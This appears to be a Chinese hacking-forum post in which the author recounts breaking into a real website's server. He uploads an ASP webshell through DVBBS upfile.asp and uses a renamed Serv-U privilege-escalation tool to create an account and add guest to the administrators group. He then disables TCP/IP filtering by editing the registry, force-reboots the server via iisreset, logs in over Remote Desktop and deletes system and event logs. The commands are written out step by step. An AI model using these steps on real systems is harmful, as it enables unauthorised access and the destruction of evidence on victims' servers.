从建立用户到3389登陆
<P><FONT color=#f70909>作者:晓菲 来自:</FONT><a href="http://www.wrsky.com/" target="_blank" ><FONT color=#f70909>http://www.wrsky.com/</FONT></A></P><P>本人<a href="http://hackbase.com/network" target="_blank" >技术</A>比较菜,希望各位高手看了后不要笑话。。</P>
<P>今天下午在上网,一个<a href="http://hackbase.com/hacker/qq" target="_blank" >QQ</A>号接到某些人用那个<a href="http://hackbase.com/hacker/qq" target="_blank" >QQ</A>发言<a href="http://down.hackbase.com/" target="_blank" >软件</A>发来的消息,反正就是广告好了,但是也没太黄,或者太难听,就是宣传自己的主页的,一般碰到这样的情况我都爱理不理,正好看到他和我是一个地方的,我们这小山钩钩还有人会在网上发布消息,真晕哦。不行,得去看一看,我没有直接打开,(我也怕里面有网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>),好吧,用明小子的Domain,就是那个旁注<a href="http://hackbase.com/hacker/tool" target="_blank" >工具</A>,一般我都喜欢先看一下,扫到一个upfile.asp,是DVBBS,很容易的上传一个马,好了,进入,我使用的是冰点的2005.asp和火狐专用版4.asp,(其实我还是比较喜欢用老兵的<a href="http://hackbase.com/hacker" target="_blank" >木马</A>,但是不知道什么原因不能用了,555,<a href="http://hackbase.com/network" target="_blank" >技术</A>菜真汗。~~~)好了,废话不说了,开工。
我主要介绍一下建立管理员的过程,好,先看看能打开别的盘不能,
哇,这个<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器很好,可以浏览整个<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器里硬盘里的所有数据,而且还可以写入
使用一下net user
返回的提示信息显示,只有默认的几个帐户,嘿,
在试一下
net user xiaofei xiaofei /add ps:建立一个xiaofei的用户名<a href="http://hackbase.com/hacker" target="_blank" >密码</A>也是xiaofei
ASP<a href="http://hackbase.com/hacker" target="_blank" >木马</A>没有显示,哎看来不行,我还没有试过直接可以用ASP<a href="http://hackbase.com/hacker" target="_blank" >木马</A>建立用户名的<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器呢,(其实以前也没有成功过)
哎那就在换别的方法
好的,看他用PCANYWHERE了吗,一般使用这个作为网站管理的比较多。
找一下他的默认目录:
C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/
哎,这个<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器也没有装,难道没有方法建立用户名了吗?
在找找,在D盘里看到了SERU,忘记看版本了,想到可以用<a href="http://hackbase.com/hacker/tool" target="_blank" >工具</A>提权,就糊里糊涂的上传了一个<a href="http://hackbase.com/hacker/tool" target="_blank" >工具</A>上去,找了一个<a href="ftp://ftp.exe/" target="_blank" >ftp.exe</A>,ok,然后
D:ftp.exe "net user xiaofei xiaofei /add"
提示一大堆返回信息什么的,然后使用了一下net user 看到xiaofei这个用户名了,就是成功了。
D:ftp.exe "net user xiaofei xiaofei /add"
继续提权,在继续输入
D:ftp.exe "net localgroup administrators guest /add“
又成功,然后执行了一下netstat -an 看了一下,ok,3389已经开放了,不用在麻烦我去开3389了,ok,找3389终端登陆,go。
打开终端了,但是连不上,晕忽忽。哭哟,用户名都建好了,还连不上主机,在翻了一下目录,也没看到有<a href="http://hackbase.com/hacker" target="_blank" >防火墙</A>,使用ipconfig -all,也没有和内网连接的迹象呀,郁闷ing,不知道怎么办了。正好在冰点极限<a href="http://bbs.hackbase.com/" target="_blank" >论坛</A>看到了一篇文章,“从上传webshell到突破<a href="http://hackbase.com/hacker" target="_blank" >TCP/IP</A>筛选到3389终端登陆”(我在下面的回帖中会放上这个帖子,帖子中有详细的介绍)其实这样的文章好多,平时其实没怎么注意的,正好现在被我看到了,哈哈运气好,希望明天买彩票也能中个500W就好了。ok。其实是<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器做了TCP,IP筛选,3389端口可能只能让某一段IP进行访问,那好吧,我们就把他删掉。
D:\ftp.exe "regedit -e D:\.1reg HKEY<a href="http://www3.hackbase.com/hacker/hacker/200501239668.htm#" target="_blank" >_</A>LOCAL<a href="http://www3.hackbase.com/hacker/hacker/200501239668.htm#" target="_blank" >_</A>MACHINE\SYSTEM\ControlSet001\Services\Tcpip" 导出<a href="http://hackbase.com/skill/regedit" target="_blank" >注册表</A>里关于<a href="http://hackbase.com/hacker" target="_blank" >TCP/IP</A>筛选的第一处
D:\ftp.exe "regedit -e D:\2.reg HKEY<a href="http://www3.hackbase.com/hacker/hacker/200501239668.htm#" target="_blank" >_</A>LOCAL<a href="http://www3.hackbase.com/hacker/hacker/200501239668.htm#" target="_blank" >_</A>MACHINE\SYSTEM\ControlSet002\Services\Tcpip" 导出<a href="http://hackbase.com/skill/regedit" target="_blank" >注册表</A>里关于<a href="http://hackbase.com/hacker" target="_blank" >TCP/IP</A>筛选的第i二处
D:\ftp.exe "regedit -e D:\3.reg HKEY<a href="http://www3.hackbase.com/hacker/hacker/200501239668.htm#" target="_blank" >_</A>LOCAL<a href="http://www3.hackbase.com/hacker/hacker/200501239668.htm#" target="_blank" >_</A>MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" 导出<a href="http://hackbase.com/skill/regedit" target="_blank" >注册表</A>里关于<a href="http://hackbase.com/hacker" target="_blank" >TCP/IP</A>筛选的第三处
然后下载到自己的PC里,使用记事本编辑,然后ctrl+F搜索EnableSecurityFilters"=dword:00000001这个参数,把它改成EnableSecurityFilters"=dword:00000000。 把1.reg,2.reg,3.reg都改过来,然后上传回<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器路径中,我又上传到了D盘里,~好了,我们要把刚才编辑的1,2,3都导入<a href="http://hackbase.com/skill/regedit" target="_blank" >注册表</A>中。
D:\ftp.exe "regedit -s D:\1.reg" 直接将1.reg导入到<a href="http://hackbase.com/skill/regedit" target="_blank" >注册表</A>中
另外两个也一样。
然后在执行
D:\ftp.exe "<a href="http://hackbase.com/network" target="_blank" >iis</A>reset /reboot /timeout:00" 利用他自身的<a href="http://hackbase.com/network" target="_blank" >iis</A><a href="http://vip.hackbase.com/" target="_blank" >服务</A>来重新启动他的机器,/timeout:00这个参数是让他立即重新启动,也就是一小会,访问网站,已经访问不进去了,差不多几分钟后,可以访问了,直接登陆3389,输入我建立的用户名,ok了。我们的提权访问工作也做完了。最好也把日志清一下,做坏事了嘛,嘿嘿。下面是日志存放文件,在DOS下运行一下就ok了,不在需要用用别的<a href="http://hackbase.com/hacker/tool" target="_blank" >工具</A>咯。
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
当然人家做个<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器也不容易,大家不要对国内的机器进行破坏哦。好了,找<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器的管理员的联系方法去了,如果你要是做违法的事,小心警察叔叔第二天来敲门哦。。。
本人只会使用一些别人编写好的程序进行对网站的<a href="http://hackbase.com/hacker" target="_blank" >攻击</A>,但是对基本的原理还不太了解,来到火狐希望能和大家一起学习一些基础的<a href="http://hackbase.com/network/zs" target="_blank" >知识</A>,大家来一起学习吧。
本人在申请火狐<a href="http://bbs.hackbase.com/" target="_blank" >论坛</A>的认证<a href="http://vip.hackbase.com/" target="_blank" ><a href="http://www3.hackbase.com/News/vip" target="_blank" >会员</A></A>,希望管理员看在打了这么多字的份上在多考虑一下拉,好好学习,天天向上。</P> 好好学习……
页:
[1]